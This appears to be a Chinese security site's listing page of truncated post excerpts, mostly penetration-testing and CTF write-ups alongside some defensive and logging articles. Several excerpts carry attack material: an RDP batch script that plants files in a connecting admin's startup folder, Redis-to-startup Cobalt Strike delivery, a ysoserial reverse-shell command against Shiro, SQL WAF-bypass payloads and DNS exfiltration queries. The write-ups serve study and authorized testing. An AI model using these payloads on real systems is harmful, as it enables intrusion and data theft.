红队攻击面相关讨论

0x00 前言 Raven 2是一个中等难度的boot2root 虚拟靶机。有四个flag需要找出。在多次被攻破后，Raven Security采取了额外措施来增强他们的网络服务器安全以防止黑客入侵。 靶机下载地址：https://download.vulnhub.com/raven/Raven2.ova 0x01 存活主机 1.在windows上的scan ports工具对目标整个网段(192.168.1.0/24)进行扫描发现192.168.1.12就是目标靶机，并开放了80，22，111端口。 2.在linux下可通过arp-scan和netdiscover命令进行主机存活探测,发现192.168.1.101是目标靶机. root@backlion#arp-scan -l or root@backlion#netdiscover -r192.168.1.0/24 0x02 端口探测 1.通过namp对目标主机进行端口扫描 nmap -A192.168.1.12 2.发现22，80和111端口是开放的，其中80端口运行了一个web应用,可以通过入侵web进入系统，爆破22端口由于目标靶机设置的系统口令太强，这里不建议爆破。 0x02 目录猜解 1.在linux中可以使用dirb进行目录扫描 2.同时也可以在windows上通过dirbuster进行目录扫描，更直观地看出目录结构。 3.扫到几个一级目录，一个个查看下文件的内容，在/vendor/目录下发现了两个有趣…

近期在项目中管理员在rdp挂载之后搞掉了管理员，想着有时间就整理下针对rdp的利用方法。 针对挂盘的利用方法复制文件这个不多说，可以根据的不同的挂盘来决定是拖文件还是放启动项。有一些自动文件监控和拷贝的应用,如：https://github.com/cnucky/DarkGuardianDarkGuardian是一款用于监控RDP登录后TSCLIENT(挂盘)的工具,工具后台运行时可自动获取挂盘的文件列表,下载指定文件,拷贝木马文件到挂载硬盘的启动项等功能 RDPInception这种方法相对鸡肋一点，原理就是利用bat脚本放到server启动项/winlogon执行脚本处，等待管理员挂盘后重启执行命令。 @echo off echo Updating Windows ... @echo off timeout 1 >nul 2>&1 mkdir \\tsclient\c\temp >nul 2>&1 mkdir C:\temp >nul 2>&1 copy run.bat C:\temp >nul 2>&1 copy run.bat \\tsclient\c\temp >nul 2>&1 del /q %TEMP%\temp_00.txt >nul 2>&1 set dirs=dir /a:d /b /s C:\users\*Startup* set dirs2=dir /a:d /b /s \\tscl…

0x00 前言简介 红队的SIEM有两个主要目标： 通过创建一个集中管理中心，收集和丰富来自多个 teamservers的所有相关操作日志，增强了红队人员的可用性和概述。这对于在操作中进行历史搜索以及提供操作的可预览视图（例如蓝队）非常有用。特别适用于多场景、多teamservers、多成员和多时间操作。此外，查看所有屏幕截图、IOC、键盘输出等简单方法 通过一个集中管理中心收集和丰富来自重定向器的所有流量日志来发现蓝队。使用特定的查询，现在可以检测到蓝团队正在探测您的基础结构设施。 项目地址：https://github.com/outflanknl/RedELK 0x01 体系架构概述 以下是RedELK如何运行的体系架构概述。 redelk使用典型的组件filebeat（传送）、logstash（过滤）、elasticsearch（存储）和kibana（查看）。rsync用于teamserver数据的第二次同步：日志、键盘输入、截图等。nginx用于对kibana进行身份验证，并在操作员浏览器中以简单的方式提供截图、beaconlogs、键盘输入。 一组python脚本用于大量丰富日志数据，以及用于Blue Team检测。 0x02 安装和配置 执行安装需要几个重要步骤。每个步骤都需要执行： 1.生成密钥和包 我们需要生成用于加密重定向器/ teamservers和redelk服务器之间的filebeat流量的TLS密钥对。 配置./certs/config.cnf以包含TLS证书的正确详细信息。在…

0x01 简介本次测试为实战测试，测试环境是授权项目中的一部分，敏感信息内容已做打码处理，仅供讨论学习。请大家测试的时候，务必取得授权。 拿到授权项目的时候，客户只给我了一个公司名字，这里以某某公司代替。 0x02 信息搜集老办法，先是子域名扫描，然后目录扫描，发现了个鸡毛，啥利用点也没有，而且是云主机。进一步探测资产，欧力给，发现了CVE-2019-0708。targetr是windows server 2008 r2系统。 0x03 Getshell心想，发现了CVE-2019-0708，这样shell总稳了吧。这时迟那时快，拿出我的大保健msf，梭哈一波。卧槽，居然发现不能利用，探测到有漏洞，但是创建session失败。 不甘心，set target也没用，攻击了20多次，还是一样的错误，害苦了客户的靶机，跟着蓝屏20多次。 继续看，发现有redis资产，尝试弱口令看看，居然密码是123123，先查看一下信息： 这里利用有个难点，就是我们根本不知道网站的实际物理路径，尝试报错或者物理路径爆破，无果~~~，所以无法通过写一句话等形式拿下Webshell；这里也没有像linux一样的反弹利用；也没有计划任务可写。 经过前期的信息收集发现是windows server 2008 r2，我们可以写一个启动木马的脚本放到启动里面，然后利用CVE-2019-0708“强迫”主机重启。 说干就干，这里用powershell的cs马（请注意免杀，这里不讨论）。先设置redis的工作目录为windows的启动目录，然后写cs的马，最好记得务必s…

理论介绍 基本原理 欧拉函数 欧拉函数φ(n):是小于n的自然数中与n互质的数的个数 φ(n)的计算方法并不复杂，但是为了得到最后那个公式，需要一步步讨论: 第一种：n=1 φ(1) = 1 第二种：n是质数 φ(n)=n-1 质数与小于它的每一个数都构成互质关系 第三种：n=p^k(p为质数，k为正整数φ(n)=φ(p^k)=p^k-p^(k-1)=p^k*(1-1/p) 只有当一个数不包含质数p,才可能与n互质，而包含质数p的数一共有p^(k-1)个，即1*k、2*k、...p^(k-1)*k 第四种：n可以分解成两个互质的整数之积φ(n)=φ(p1*p2)=φ(p1)*φ(p2)(中国剩余定理) 最终推理: n=p1^k1*p2^k2*p3^k3...pr^kr(任意一个大于1的正整数,都可以写成质数的积) 由4得:φ(n)=φ(p1^k1)*φ(p1^k2)...φ(pr^kr) 由3得:φ(n)=p1^k1*p2^k2...pr^kr*(1-1/p1)*(1-1/p2)..*(1-1/pr) 所以:φ(n)=n*(1-1/p1)*(1-1/p2)*...(1-1/pr) φ(n)=n*(1-1/p1)*(1-1/p2)*...(1-1/pr) 欧拉定理 a^φ(n)≡1 (mod n) a和n互质 费马小定理(欧拉定理的特例) a^(p-1)≡1(mod p) p是质数,a,p互质 模反元素(逆元) a*b≡1(mod n…

20231206085712722.doc 下载 doc文件 262.3K

概述通过替换认证信息后重放请求，并对比数据包结果，判断接口是否存在越权漏洞 特点 支持HTTPS自动过滤图片/js/css/html页面等静态内容多线程检测，避免阻塞支持输出报表与完整的URL、请求、响应安装和使用 安装依赖 git clone https://github.com/y1nglamore/IDOR_detect_tool.git启动 即可监听socks5://127.0.0.1:8889。 安装证书 使用SwitchOmega等插件连接该代理，并访问mitm.it即可进入证书安装页面，根据操作系统进行证书安装。 以MacOS为例： 下载安装后，打开钥匙串访问，找到mitmproxy证书，修改为alwaystrust 检测漏洞 首先准备好目标系统的A、B两账号，根据系统的鉴权逻辑（Cookie、header、参数等）将A账号信息配置config/config.yml，之后登录B账号 使用B账号访问，脚本会自动替换鉴权信息并重放，根据响应结果判断是否存在越权漏洞 生成报表 每次有新漏洞都会自动添加到report/result.html中，通过浏览器打开： 点击具体条目可以展开/折叠对应的请求和响应： 检测逻辑 原文连接：https://github.com/y1nglamore/IDOR_detect_tool

获取环境:拉取镜像到本地 启动环境 $ docker run -d -p 80:8080 medicean/vulapps:s_shiro_11.使用shiro_attack_2.2工具对目标系统进行检查，发现有默认key但是无利用链 2.使用shior_tools.jar 直接对目标系统进行检测，检测完毕后会返回可执行操作 java -jar shiro_tool.jar http://10.11.10.108:8081/login.jsp 2、选0让输入dnslog地址，通过dnslog测试有回显，这里有个注意点：使用 http://dnslog.cn/ 部分站点会拦截，可以换多个dnslog平台测试 dnslog有回显接下来就是拿shell了，这里由于固定思维，之前遇到的都是linux系统，先入为主觉得是Linux，结果没利用成功，一开始以为是防火墙拦截，后面探测了一下目录结构，发现是windows，所以这里payload要改变一下 3、在公网VPS上使用ysoserial开启端口，执行反弹命令 java -cp ysoserial-master-30099844c6-1.jar ysoserial.exploit.JRMPListener 1999 CommonsCollections5 "编码后bash命令" 这里面的编码的内容在步骤4 坑一：CommonsCollection1-5 如果不反弹shell，换着使用 4、bash反弹命令编辑 https://x.hacking8.com/…

前言 参赛队员:lemon godyu biu801 ->Web方向 100％_upload 打开 fuzz一遍发现php被过滤 改后缀发现内容不能涵盖php 最后发现jpg png等都能上传 文件内容以<? ?>来取代<?php ?>绕过文件内容拦截 文件内容被include函数解析 蚁剑连 拿flag 方法2 这里可以先用伪协议读取下upload.php的源码看一下过滤 <?php if(isset($_FILES['upfile'])){ $uploaddir = 'uploads/'; $uploadfile = $uploaddir . basename($_FILES['upfile']['name']); $ext = pathinfo($_FILES['upfile']['name'],PATHINFO_EXTENSION); $text = file_get_contents($_FILES['upfile']['tmp_name']); echo $ext; if (!preg_match("/ph.|htaccess/i", $ext)){ if(preg_match("/<\?php/i", $text)){ echo "茂夫说：你的文件内容不太对劲哦&lt…

最近刚开始学习pwn，来复现一下打完的sictf的一道pwn签到题目 题目 思路 先下载附件，拿到ida里反汇编看一下 其中setup函数是初始化的，我们主要看run函数 大致意思就是定义了一个buf数组和nbyte变量，然后先读入nbytes的值，然后read函数根据nbytes的大小来读入buf数组,其中对nbytes有一个检测，不能超过0x40(64),要不然会直接退出，乍一看这个不会导致栈溢出，但是仔细看if语句 对nbytes有个类型转换，unsigned_int8 是c语言中无符号的8位整数，范围为0-255，如果超过了255则取对256取模的结果作为转换后的结果，而在read函数中传入的是unsigned int，这样我们就可以通过控制nbytes来造成栈溢出，ret跳转到后门函数 后门函数中， 我们无法控制a1的值，再看run函数，read之后会执行strdup函数 在64位汇编中，一般用rax寄存器来保存返回值，所以我们rax寄存器会保存字符串的指针 再看system函数，在调用之前会吧rax寄存器赋值到rdi寄存器，rdi也就是调用函数的第一个参数，这样我们可以把/bin/sh 写入到数组中从而获取shell exp 先本地找一下偏移量 88减去/bin/sh\x00也就是80 python脚本 from pwn imp…

0x01 前言 去年年底，当设置一个模拟器来定位SMB协议时，发现了一个如此简单而又非常有效的攻击大型企业的漏洞。TL; DR：一个拒绝服务错误允许BSOD协议向Windows 8.1和Windows Server 2012 R2计算机发送单个数据包。 0x02 测试环境 受影响的系统： ·Windows 8.1（x86） ·Windows Server 2012 R2（x64） 0x03 背景知识 要了解此漏洞的根本原因，需要了解SMB数据包的结构方式。 让我们来看一下SMBv1协议头文件： 正如我们所看到的协议字段以FF字节开始,现在让我们来看看SMBv2 协议字段现在以FE字节开始,那么SMBv3呢？SMB协议的v3版本已经过加密，并将使用SMB2_Transform的特定头部进行加密通信： SMBv3 始终是加密的，正如可以在官方文档中了解到SMBv3会话的协商从SMBv2会话开始。以下是设置SMBv3会话时涉及到的数据包： 在1到8字节的数据包中，SMB数据头看起来像这样： 我们可以看到，使用的字节序列仍然是0xFE，它是Microsoft官方文档中指示的SMBv2的代码。 从第9字节开始，加密处于连通状态，并且报头中使用的字节序列将为0xFD 正如您在PoC中看到的那样，当第一次会话时立即发送带有0xFD报头的SMB数据包时会发生内核崩溃。现在，让我们深入了解崩溃转储机制，以了解此次崩溃的根本原因。 0x04 根本原因分析 仅在Windows 8.1（x86）上执行来…

1. 概述1.1 案例先来看两张图： 看到这两张图的第一印象应该是这是一个成功的登陆，其类型为3，代表网络登陆，4624表示成功登陆，可能大部分人都是如此认为。 那么实际上呢？这里面是存在一定歧义的，今天给大家同步一下这里面的详细细节。 1.2 原理当用户使用SMB 协议连接时，在提示用户输入密码之前，其会使用anonymous用户（也就是匿名用户）进行 SMB 网络连接，一旦网络将被记录为成功连接。其有以下几个条件会导致产生这条日志： 登陆用户为anonymous 登录进程为NTLMssp 使用协议为NTLM V1 登陆协议为SMB 2. 测试2.1 SMB连接失败情况2.1.1 找不到网络名/拒绝访问直接使用net use发起一个针对不存在的aaa$的连接，会报错找不到网络名，使用net use也可以看到其连接并没有成功： 但是我们来看看日志，可以看到其产生了一条4624类型3的成功登陆的日志，这个仅仅表示使用anonymouse用户成功登录网络 使用正确的目录路径，但不输入用户会报错拒绝访问，该状态同样会导致一个匿名用户的登录成功 类型3 2.1.2 用户名或密码不正确使用不正确的账密登录时，会报错用户名或密码不正确。 这种情况在日志中就不会出现匿名登录登录成功日志，而是直接显示4625日志，当然也显示了登录的用户名。 2.2 SMB登录成功如果使用正确的账密进行登录的话在日志中的表现是如何呢？ 除类型3的登录成功以外，还会有4776（验证凭据）和4672（登录权限分配）的shijian 3. 总结当攻击者使…

0x00 初识splunk 一、公司： 美国Splunk公司，成立于2004年，2012年纳斯达克上市，第一家大数据上市公司，荣获众多奖项和殊荣。 总部位于美国旧金山，伦敦为国际总部，香港设有亚太支持中心，上海设有海外第一个研发中心。目前国内最大的客户许可是800GB/天。 产品：Splunk Enterprise【企业版】、Splunk Free【免费版】、Splunk Cloud、Splunk Hunk【大数据分析平台】、Splunk Apps【基于企业版的插件】等。 二、产品： Splunk Enterprise，企业版，B/S架构，按许可收费，即每天索引的数据量。 (购买20GB的许可，则默认每天可索引20G数据量；一次购买永久使用；如果使用试用版，试用期结束之后会切换到免费版) Splunk Free，免费版，每天最大数据索引量500MB，可使用绝大多数企业版功能。 （免费版没有例如：身份验证、分布式搜索、集群等功能） Splunk Universal Forwarder，通用转发器，是Splunk提供的数据采集组件，免费，部署在数据源端，无UI界面，非常轻量，占用资源小。 （转发器无许可证，是免费的；企业版专用的；所以部署在数据源，例如：部署在你的WEB服务器上，监控你的WEB日志，实时监控，产生一条日志则转发一条，进行增量转发；一般配置修改配置文件或者使用CLI命令。占用资源小） 三、Splunk是什么 面向机器数据的全文搜索引擎； （使用搜索引擎的方式处理数据；支持海量级数据处理） 准实时的日志…

一、SpringBoot env 获取* 敏感信息 当我们直接访问 springboot 站点时,可以看到某些 password 字段填充了* 通过${name} 可以获取明文字段 2. 配置不当导致敏感信息泄露(password 打星号,而 pwd 没有打星号) 参考 https://mp.weixin.qq.com/s/HmGEYRcf1hSVw9Uu9XHGsA 具体实现过程: 例如: 我们要获取 pid 参数值 "PID": "10648", POST /env HTTP/1.1 Host: 10.20.24.191:8090 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 76 eureka.client.serviceUrl.defaultZone=ht…

（1）注入的分类 基于从服务器接收到的响应 ▲基于错误的SQL注入 ▲联合查询的类型 ▲堆查询注射 ▲SQL盲注 •基于布尔SQL盲注 •基于时间的SQL盲注 •基于报错的SQL盲注 基于如何处理输入的SQL查询（数据类型） •基于字符串 •数字或整数为基础的 基于程度和顺序的注入(哪里发生了影响) ★一阶注射 ★二阶注射 一阶注射是指输入的注射语句对WEB直接产生了影响，出现了结果；二阶注入类似存储型XSS，是指输入提交的语句，无法直接对WEB应用程序产生影响，通过其它的辅助间接的对WEB产生危害，这样的就被称为是二阶注入. 基于注入点的位置上的 ▲通过用户输入的表单域的注射。 ▲通过cookie注射。 ▲通过服务器变量注射。 （基于头部信息的注射） url编码：一般的url编码其实就是那个字符的ASCII值得十六进制，再在前面加个% 具体可以看http://www.w3school.com.cn/tags/html_ref_urlencode.html，这里可以查到每个字符的url编码，当然自己编程或者用该语言应该也有自带的函数，去实现url编码 常用的写出来吧： 空格是%20，单引号是%27， 井号是%23，双引号是%22 判断sql注入（显错和基于错误的盲注）：单引号，and 1=1 和and 1=2，双引号，反斜杠，注释等 判断基于时间的盲注:在上面的基础上，加个sleep函数 ，如sleep(5) (函数不同数据库有所不同)例子： ' and sleep(5) "…

phpstduy安装 搭建sqli-labs靶场需要php和mysql环境，可以直接用phpstudy的集成环境，先去官网下载phpstud [下载连接] https://www.xp.cn/ 下载自己对应的版本， 自定义安装到d盘 之后打开启动mysql和nginx sqli-labs安装 https://github.com/Audi-1/sqli-labs 下载源码，解压到刚才phpstudy目录下www文件夹中 修改/sqli-labs/sql-connections/credb.inc文件中mysql账号密码，使之能连接上数据库 默认数据库密码为root 之后用phpstudy创建网站， 域名填127.0.0.1，端口可以修改也可以不修改，因为我之前的网站用过80端口了，所以我选择了7777端口 进入网站首页 初始化数据库 显示信息是这样就搭建完成了

0x00 起因 实际案子的时候遇到了一个注入，过狗可以使用sqlmap，但是是基于时间的注入和限制频率需要使用--delay参数，本来就是延时再加上--delay等的心力憔悴。所有有了下面介绍使用sqlmap利用DNS进行oob(out of band)注入，快速出数据。一般情况下仅适用于windows平台 0x01 场景 你有没有遇到这样类似的注入场景。1、时间盲注，数据库、表及字段内容特别多，等到花儿也谢了。2、mysql5.6+只能使用mysqli或pdo连接方式，多推荐使用pdo连接。使用pdo连接方式，可以执行多语句，但是PDO只会返回第一条SQL语句的执行结果，所以一般不能直接拿到数据，被迫通过update某个可见字段或者sleep注入3、遇到waf拦截，含有特定内容的返回包接受不到，明明测试没有拦截过滤，感觉执行成功了，却没有接收到返回数据(能执行命令的时候也可以向web目录写文件) 0x02 原理 使用unc路径，会对指定的域名进行dns查询，使用dns信道，配合dns服务器收到的数据可快速得到数据内容。使用dns有一定的好处，可以突破主机网络隔离，例如dmz主机不能直接连外网，但是配置的网络可达的dns服务器往往可以，通过查询域名递归的方式，dns服务器可以将返回数据通过dns协议带出去。unc路径是windows下的特性，默认安装的linux下不存在这样的功能。 流程图如下： mysql使用pdo链接数据库盲注判断是否成功的测试语句（普通的注入也可以参考） SELECT LOAD_FILE(CONCAT('/…

SQL注入9种绕过WAF方法 0x01前言 WAF区别于常规 防火墙 是因为WAF能够过滤特定Web应用程序的内容，而常规防火墙则充当服务器之间的防御门。通过检查HTTP的流量，它可以防御Web应用安全漏洞，如阻止来自 SQL注入、 跨站点脚本 （XSS）、 文件包含和安全配置错误。 0x02 WAF工作原理 § 检测异常协议：拒绝不符合HTTP标准的请求 § 增强型的输入验证：代理和服务器端验证，而不仅仅是客户端验证 § 白名单和黑名单 § 基于规则和异常的保护：基于规则的更多是基于黑色的机制和更灵活的异常 § 状态管理：防御会话保护(Cookie保护，反入侵规避技术，响应监控和信息披露保护)。 0x03 绕过WAF 1.混合的CaseChange恶意输入会触发WAF保护，如果WAF使用区分大小写的黑名单，则更改大小写可能会绕过该过滤器。 http://target.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4 2.替换关键字（插入将被WAF删除的特殊字符）---SELECT可能变为SEL <ECT，一旦删除特殊字符，它将用SELECT执行 http://target.com/index.php?page_id=-15&nbsp;UNIunionON SELselectECT 1,2,3,4 3.编码 page.php?id=1%252f%252a*/UNION%252f%252a /SELECT 十六进制编码： target.com/i…

一些朋友在群里经常遇到sql注入的问题，有时候有waf、有时候是盲注、有时候不知道如何下手? 今天分享一款工具，名字是超级注入工具 下载地址： https://github.com/shack2/SuperSQLInjectionV1 案例1: 带waf的盲注 如下图，单引号报错，而且有报错回显，这种情况利用就是典型的布尔盲注，只要我们能在后面构造一个 and 1=1 或者 or 1=1这种语句，就能出数据 这里是mysql的数据库，通常借助if函数来布尔注入，waf通常不拦单个if()，但会拦if(1,1,1)这种，如果拦了，可以把1替换成11-10，2替换成12-10这种 然后，超级注入工具一把梭就行了， 绕过waf正则就下面这种，比较简单 案例2: 案例1构造的and是为了超级注入工具去识别页面返回的内容，去判断出 1=1正确的页面字段和1=2错误页面的字段，正常工具是识别不到注入点的，所以你要指定字段，给工具一个布尔注入的依据！ 再来看一个例子，希望你能理解我的意思，， 如下图，还是mysql，成功构造出一个if 报文贴入超级注入工具，这款工具测试盲注只会测试1=1和1=2,所以，在if的第一个位置设置payload，看右下角的框，已经识别到正确页面的回显值，那后面，数据就出来了！ 案例3: 这里提供一个mssql类型的， 也就是Sql-server，站点存在waf,测试oR 1=1 和 1=2这种不拦截，利用1=1这里构造下数据…

这次的目标是个购物站点，希望发现更多的漏洞，最好是能拿到shell。 一些常见的漏洞都存在，比如任意修改他人密码、修改商品金额等逻辑漏洞都是存在的。但这里就不提这些逻辑漏洞了，这里说一说ssrf。 注册会员后，前台很多上传点，但是均无法上传shell。 通过nmap扫描端口发现对外开放了3306端口，也就是mysql数据库端口。 然后在一处下载文件的地方，看到了个可疑的url。 通过dnslog测试，发现是个ssrf漏洞。 尝试访问百度，得到出是完全回显的ssrf漏洞。 尝试这个ssrf是否支持其他协议，发现支持file协议，完全回显，又可以读文件，真舒服。 那么现在只需要让网站报错 爆出绝对路径，或者尝试去读取一些配置文件看看能否找到网站的绝对路径，最终读取到网站数据库的配置文件，那么就可以连接上数据库就可以拿到管理员账号密码了。 读取到 /etc/httpd/conf/httpd.conf 这个文件，发现网站路径为 /var/www/html 。 于是准备尝试去读取index.php发现居然没有内容，最后各种测试，各种组合，都没任何关于网站的回显，自闭了。 没办法，那就只有想办法让网站报错，看看路径对不对。 终于找到了个点让网站报错，发现之前的路径不对。 最终经过翻代码，找到了数据库配置文件，成功的找到了数据库账号密码。 成功连上了数据库。 最终成功进了后台。 后台还有个这个功能…… 嗯…… 非常好 over…… Uploading Attachment...

0x00 漏洞简介Apache Struts2框架是一个用于开发Java EE网络应用程序的Web框架。Apache Struts于2020年12月08日披露 S2-061 Struts 远程代码执行漏洞(CVE-2020-17530)，在使用某些tag等情况下可能存在OGNL表达式注入漏洞，从而造成远程代码执行，风险极大。0x01 漏洞描述Struts2 会对某些标签属性(比如 `id`，其他属性有待寻找) 的属性值进行二次表达式解析，因此当这些标签属性中使用了 `%{x}` 且 `x` 的值用户可控时，用户再传入一个 `%{payload}` 即可造成OGNL表达式执行。S2-061是对S2-059沙盒进行的绕过。0x02 漏洞影响struts 2.0.0 - struts 2.5.250x03 漏洞复现一.环境搭建1.docker环境地址：https://github.com/vulhub/vulhub/tree/master/struts2/s2-061docker-compose up -d #启动docker环境2.访问目标地址 http://192.168.1.14:8080/index.action 二、漏洞利用1.DNSlog验证漏洞 POST /index.action HTTP/1.1Host: 192.168.1.14:8080Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows N…

漏洞描述： 2017年9月5日，Apache Struts发布最新安全公告，Apache Struts2的REST插件存在远程代码执行的高危漏洞，该漏洞由lgtm.com的安全研究员汇报，漏洞编号为CVE-2017-9805（S2-052）。Struts2 REST插件的XStream组件存在反序列化漏洞，使用XStream组件对XML格式的数据包进行反序列化操作时，未对数据内容进行有效验证，存在安全隐患，可被远程攻击 漏洞编号: CVE编号:CVE-2017-9805 漏洞复现: 利用弹出计算器复现： 漏洞环境为：win2008sr2+tomcat9.0 1.从struts2的官网下载最后受影响的版本struts-2.5.12，其下载地址： http://archive.apache.org/dist/struts/2.5.12/struts-2.5.12-apps.zip 拿到struts-2.5.12-apps之后，将其中的app目录下的struts2-rest-showcase.war文件放到webapps目录下，我的是 D:\apache-tomcat-9.0.0.M26\webapps 2.浏览器中访问地址：http://ip地址:8080/struts2-rest-showcase/ 会跳转，然后出现下面的页面： 3.点击一个edit进行编译页面，然后提交，并用burp抓包。 并发送到repeater进行修改包如下： 这里将： Content-Typ…

0x00 swaks简介 Swaks是一个功能强大，灵活，可编写脚本，面向事务的SMTP测试工具，由John Jetmore编写和维护。 目前Swaks托管在私有svn存储库中。官方项目页面是http://jetmore.org/john/code/swaks/ 下载安装：（kali系统下自带，如果出错，可使用以下地址下载安装） v20181104.0发行版：http://jetmore.org/john/code/swaks/files/swaks-20181104.0.tar.gz 前提条件:yum install perl (centos下） tar zxvf swaks-20181104.0.tar.gz cd swaks-20181104.0. ./swaks 0x01 Swaks使用 1.基本使用语法： 1).swaks --to [email protected] //测试邮箱的连通性； root@localhost swaks-20181104.0]# ./swaks --to [email protected] *** MX Routing not available: requires Net::DNS. Using localhost as mail server === Trying localhost:25... === Connected to localhost. <- 220 localhost.localdomain ESMTP Postfix -> EHLO …

本文研究了一种与 CVE-2024-7014 漏洞类似的情况。一个带有“.htm”扩展名的文件被伪装成视频并通过 Telegram API 发送，当用户期望看到视频时，实际上执行的是 HTML 中的 JavaScript 代码。 技术细节Evilloader 是一种加载程序，允许攻击者在目标系统上下载并运行其他恶意负载。CVE-2024-7014 描述了此模块的反分析机制的更新。在这种情况下，虚假视频会将受害者引导至恶意软件（虚假播放保护）下载页面，然后还会发送 IP 记录器。 漏洞详细信息该漏洞主要原因是Telegram服务器响应中的“.htm”文件格式被误认为是视频。“.htm”代码片段在浏览器中以“content://”打开。即： content://org.telegram.messenger.provider/media/Android/data/org.telegram.messenger/files/Telegram/Telegram%20Video/4_5924894289476721732.htm 打开内容，从而允许触发并打开指定的HTML页面。 场景（IP 记录器）受害者可能会尝试使用视频播放器打开此文件，如果失败（因为它不是实际的视频格式），它会重定向到默认浏览器，或者如果它被理解为“HTML 文件”，则可以双击在浏览器中打开。这允许恶意 JavaScript 运行。 如果受害者从 Telegram 下载该文件时以为它是一个视频，浏览器实际上会运行 HTML 内容，并且 IP 信息会发送到攻击者的服务器。 转换文件…

Using Meterpeter commands Since the Meterpreter provides a whole new environment, we will cover some of the basic Meterpreter commands to get you started and help familiarize you with this most powerful tool. Throughout this course, almost every available Meterpreter command is covered. For those that aren’t covered, experimentation is the key to successful learning. help The ‘help‘ command, as may be expected, displays the Meterpreter help menu. meterpreter > help Core Commands ============= Command Description ------- ----------- ? Help menu background Backgrounds the current session channel Displays informatio…